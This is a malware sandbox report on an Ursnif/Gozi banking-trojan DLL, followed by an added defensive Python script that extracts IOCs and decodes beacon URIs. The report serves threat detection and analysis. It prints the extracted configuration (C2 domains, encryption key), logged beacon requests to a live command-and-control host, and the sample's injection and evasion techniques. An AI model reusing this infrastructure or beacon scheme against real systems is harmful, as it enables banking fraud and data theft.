Windows Analysis Report
61ee6edf7de65.dll

Overview

General Information

Sample Name: 61ee6edf7de65.dll
Analysis ID: 558657
MD5: b6f0fc5638a110abac1a54805f77e786
SHA1: f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
SHA256: 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
Tags: BRT, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 00000003.00000002.498576168.00000000059E0000.00000040.00020000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "bkFTFgKp65D5Jru5rf49R+GXnNukXGpZwjIwkjTtlHtgZk7oxIROD9a73bCW6q+N//ka8JpBA5kzPLmOYX0Yasr3Rl/9Zuz9f2VWaX0efOwZY2QKrOoQ67764YcBo8lsKwkYr7PpHkMHQxnMs6NEKJ6J1N6xfUndxmGR7l13Aaosa8p5sAWD3DLmA1KYT+Yo7POW4hnwwj/vfsWt00ns0kdIj1rxgp6FgYSdcYrFJsGyw1c4V2WgskLjtOH2H4NxYnKJgMX4ugqjKvCIFcuUg9umN2tNFjXLFbc81b/KRkQqTX8MMan6JAeAyuM92LJfIu2ZUFHAyr0vE+Uoz2nr6m8vyE3ODdwccpisKQUEL5E=", "c2_domain": ["giporedtrip.at", "habpfans.at"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "OejOdTRHaO03XbEm", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "20000", "SetWaitableTimer_value": "1"}
Source: 61ee6edf7de65.dll Virustotal: Detection: 24%
Source: 61ee6edf7de65.dll Avira: detected

Cryptography

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F278F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00F278F2

Compliance

Source: 61ee6edf7de65.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 61ee6edf7de65.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbpsd1 source: powershell.exe, 0000000D.00000003.464647670.00000288719D5000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_04B3B190
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04B3B2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04B4D39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_059EB190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_059FD39D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_059EB2F7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4FD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04B4FD82

Networking

Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49760 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49761 -> 138.36.3.134:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49762 -> 211.40.39.251:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49763 -> 61.98.7.132:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49763 -> 61.98.7.132:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49764 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49764 -> 91.203.174.38:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49765 -> 121.136.102.4:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49765 -> 121.136.102.4:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 61.98.7.132 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: giporedtrip.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.36.3.134 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 91.203.174.38 80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View ASN Name: LGDACOM Corporation (KR)
Source: Joe Sandbox View ASN Name: TEXNET SERVICOS DE COMUNICACAO EM INFORMATICA LTD (BR)
Source: Joe Sandbox View IP Address: 211.40.39.251
Source: global traffic HTTP traffic detected: GET /drew/pNlxEnrdilKzWa9/68tqOS2uwrjSihitdE/jBbiWvTgb/3aw4cx4D47l6BXBjnON4/Fauxi0kACQab9CLvY1X/WoAQszl7aqCJx2eNbs5Szg/9_2BtMMZBWkCT/OWv_2Bj9/_2BPp2fGqVtSst7f7xYoQwH/mpPcfod9Hb/UB9Yz2aJsMDXWuTh9/ho2KCuunvmML/NRp1qNCJ2xT/_2BesCQrdlqKMQ/QvixSHRNiTVSEcLtfIY4h/0WwwQPgKD1/0.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/zeAIoWw0seSw/eyvrMUiMb_2/FvcVFvXTlvKA83/AIPgBBnSypPysLmbst0PO/R7_2FxsawNor7wTo/fZqlpG7O6GyhH5Q/ilir56XiQycslcZoXZ/qSVC_2BlG/P9i7TL0H4SKpkydIhuSL/MTdm8SLoRolWYl1Lf55/Lva_2F9tTa5U6IxpFvvIL3/Jp5Tc4NwzyFRW/sVu3oJPC/en2nnPkD5Bn3kVcHvqvqm4P/H0QeSd_2B7/IieOTNJjjpT/kGp.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/IZme6OdPQW/u_2BmYLEUfU47HJet/k_2FUef_2Bxu/bsWLGiszPFY/8oHJ6Ee5hmIU_2/F5_2BVoQk_2BruSTD534X/_2B8f_2Fo3zfeIoR/Yr0FSs5Yf6cdU04/FvQ5YxjburZ3dV1KGt/gPZeNVWrz/vabQEDTMtoB5FgDwNUIv/L2cDfpwTvEyFktn0LjD/BzBumu2cGGXpyFMbPhirpe/GFb8M35byGIHh/2IlxzLAp/4QmbK66L69oa601i8zszsD5/ozf.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/gpOOKQHU5/YopsneUUMix_2FGZrYk_/2FaCL9055O3rYKveg_2/BMYcLHEW_2B6_2BH1_2BIq/GCl9SqJ3zsF0h/uRiHRooG/iudFhrDMGJm_2FRN_2B6NM1/3JT_2Fq7zu/oEYGlG6hebhX439sT/jKSRQO714RRJ/qnfBGC5Rexs/FY6AfhSs_2BBga/CepUQnIMaDyzjxjJywQMp/Sbr0hGta57ccL2mG/IT9OtCUdHxKRc1l/X3mCPG6cz5ucxws3EJ/_2FMMYlE/Q.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8KiVfYSjGS/73gU4LPODDcjxF0SH/UKj5w7ReqWld/_2FD39lD5Kz/5xzi1kkBDyiun4/eX2QdVXKmn9zNv1_2Bebw/_2Bj1l2BOIC93Jzg/pa5W5iqolN8FKuR/6pqhw8soI60TcBnXsv/fUj7WBOr5/31qQZwplbi_2FEVv_2BA/_2Bg3LZPX_2FawVlqSQ/Z.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90KirQSsQ7O2C/HXs9eov9kNfgxo2ZRo/blD2X9oTA/M3ehnbfCXj_2BeiQgXKb/ucd0O60r4p_2FWGe4LI/GsQ05hEXJYX7DSeaALXgs4/LJcXahVRDT7HM/rEWRRjo9/OWoa99fWOrLG2ix_2FmfkKa/0wqwnttzjd/MMGwD_2BqOxL_2FmQ/i0rZ3L37/7n5Zr.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000001.00000003.390336190.00000000015A3000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/
Source: loaddll32.exe, 00000001.00000003.393869769.00000000015A5000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/drew/OgX0J5PbJW4/wt7t22qhvnCn1v/lLndh_2BLbj_2BgCTZodo/VhmNj74z1QOstcs1/NN90Kir
Source: loaddll32.exe, 00000001.00000003.390336190.00000000015A3000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/drew/pT9VBE7JySNzTsraRHWIuA/M8mhqioMqf4SN/48wxFaOc/GQc3fQ5Dw6JPElmXEMT1WYW/8Ki
Source: loaddll32.exe, 00000001.00000003.393869769.00000000015A5000.00000004.00000001.sdmp String found in binary or memory: http://giporedtrip.at/v
Source: loaddll32.exe, 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, control.exe, 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, control.exe, 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.597986982.0000028859411000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001A.00000000.473037599.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.484749682.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.446859697.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.475140198.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000D.00000002.598284700.000002885961F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: unknown DNS traffic detected: queries for: giporedtrip.at
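Added example (not part of the Joe Sandbox report or of the sample): turning the extracted configuration and the Snort/HTTP findings above into machine-checkable IOCs, and undoing the beacon URI encoding that the Snort rule names "URI Struct M1 (_2B)" and "M2 (_2F)" refer to. The config subset, Snort lines and the second GET request are copied from this report. The URI layout assumed here is that the first path component ("drew") is a fixed directory, the last component ("kGp.jlk") is a throwaway file name, and everything in between is base64 in which "+" became "_2B", "/" became "_2F", and extra "/" separators were inserted afterwards; this matches public ISFB/Gozi write-ups but is an assumption, not something the report states. Note that in the second request the separator falls inside a marker ("eyvrMUiMb_2/FvcV..."), so the path components must be joined before the markers are reversed. The decoded bytes are still Serpent-encrypted with the serpent_key from the config and are not decrypted here (the standard library has no Serpent).

```python
"""IOC extraction and ISFB beacon-URI normalisation for the findings above.

Added example for this page; the sample inputs are copied from the report,
the URI layout is an assumption (see lead-in), nothing here decrypts traffic.
"""
import base64
import json
import re

# Subset of the extracted configuration printed in the AV Detection section.
CONFIG_JSON = (
    '{"c2_domain": ["giporedtrip.at", "habpfans.at"], '
    '"ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], '
    '"serpent_key": "OejOdTRHaO03XbEm", "botnet": "20000"}'
)

# Three of the Snort alert lines from the Networking section.
SNORT_LINES = [
    "Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49760 -> 91.203.174.38:80",
    "Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49763 -> 61.98.7.132:80",
    "Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49765 -> 121.136.102.4:80",
]

# Second GET request from the Networking section; note the "_2/F" split marker.
SAMPLE_URI = ("/drew/zeAIoWw0seSw/eyvrMUiMb_2/FvcVFvXTlvKA83/AIPgBBnSypPysLmbst0PO/"
              "R7_2FxsawNor7wTo/fZqlpG7O6GyhH5Q/ilir56XiQycslcZoXZ/qSVC_2BlG/"
              "P9i7TL0H4SKpkydIhuSL/MTdm8SLoRolWYl1Lf55/Lva_2F9tTa5U6IxpFvvIL3/"
              "Jp5Tc4NwzyFRW/sVu3oJPC/en2nnPkD5Bn3kVcHvqvqm4P/H0QeSd_2B7/IieOTNJjjpT/kGp.jlk")

SNORT_RE = re.compile(
    r"Snort IDS: (?P<sid>\d+) (?P<msg>.*?) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_snort_alerts(lines):
    """Return one dict per alert line: rule SID, rule message, destination IP and port."""
    hits = []
    for line in lines:
        m = SNORT_RE.search(line)
        if m:
            hits.append({"sid": int(m["sid"]), "msg": m["msg"],
                         "dst": m["dst"], "dport": int(m["dport"])})
    return hits


def unique_c2_ips(alerts):
    """Sorted, de-duplicated destination IPs from parsed alerts."""
    return sorted({a["dst"] for a in alerts})


def config_iocs(config_json):
    """Pull the network IOCs out of the extractor's JSON and sanity-check the Serpent key size."""
    cfg = json.loads(config_json)
    return {
        "domains": set(cfg.get("c2_domain", [])),
        "ip_check": set(cfg.get("ip_check_url", [])),
        "serpent_key_len": len(cfg["serpent_key"].encode()),  # Serpent keys are 16/24/32 bytes
    }


def normalize_isfb_uri(path):
    """Reverse the assumed URI transformation.

    Returns (base64_text, decoded_bytes_or_None).  Directory and file name are
    dropped, the remaining components are joined BEFORE the '_2B'/'_2F' markers
    are reversed (the separator may split a marker), then padding is restored.
    """
    parts = [p for p in path.split("/") if p]
    if len(parts) < 3:
        return None, None
    body = "".join(parts[1:-1])                     # assumption: middle components carry the data
    b64 = body.replace("_2B", "+").replace("_2F", "/")
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:                               # binascii.Error subclasses ValueError
        raw = None
    return b64, raw


if __name__ == "__main__":
    alerts = parse_snort_alerts(SNORT_LINES)
    print("C2 IPs from Snort:", unique_c2_ips(alerts))
    print("Config IOCs:", config_iocs(CONFIG_JSON))
    b64, raw = normalize_isfb_uri(SAMPLE_URI)
    print("Normalised base64:", b64[:40], "...", "decoded bytes:", None if raw is None else len(raw))
```

Feed the full Snort and HTTP lists from the report into the same functions to get a complete IOC set; the Serpent key length check is the first thing to verify before attempting to decrypt a beacon with a library that does implement Serpent.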

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: the same 30 memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above (loaddll32.exe, rundll32.exe and control.exe regions), type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, rundll32.exe PID: 4848, control.exe PID: 4824, control.exe PID: 6104, type: MEMORYSTR
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F278F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00F278F2

System Summary

Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
